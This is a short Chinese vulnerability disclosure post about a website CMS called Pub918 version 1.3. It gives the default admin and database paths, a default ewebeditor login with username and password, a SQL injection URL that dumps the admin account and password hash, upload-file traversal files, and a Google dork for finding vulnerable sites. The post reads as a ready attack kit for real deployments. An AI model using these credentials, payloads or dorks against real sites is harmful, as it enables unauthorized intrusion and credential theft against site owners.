Pub918 软件公司网站系统 1.3 存在多处漏洞

0x0，默认后台及数据库：

    后台：admin/
    默认数据库：admin/db/N%23%23ews.mdb

0x1，ewebeditor 问题：

    路径：
        admin/webedit/admin_login.asp

    帐号密码：
        admin
        29767143

    利用：略，你懂的。

0x2，注入漏洞：

    漏洞文件：new.asp

    查询语句：union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin

    利用：随便打开一个新闻在后面加上查询语句即可爆出管理帐号密码。

    如：

        http://localhost/new.asp?id=62 union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin

0x3，ewebeditor 遍历漏洞：

    漏洞文件：

        Admin_UploadFile1.asp
        Admin_UploadFile.asp

    利用：略，你懂的。

Google 搜索：

    inurl:download.asp

Author：Mr.DzY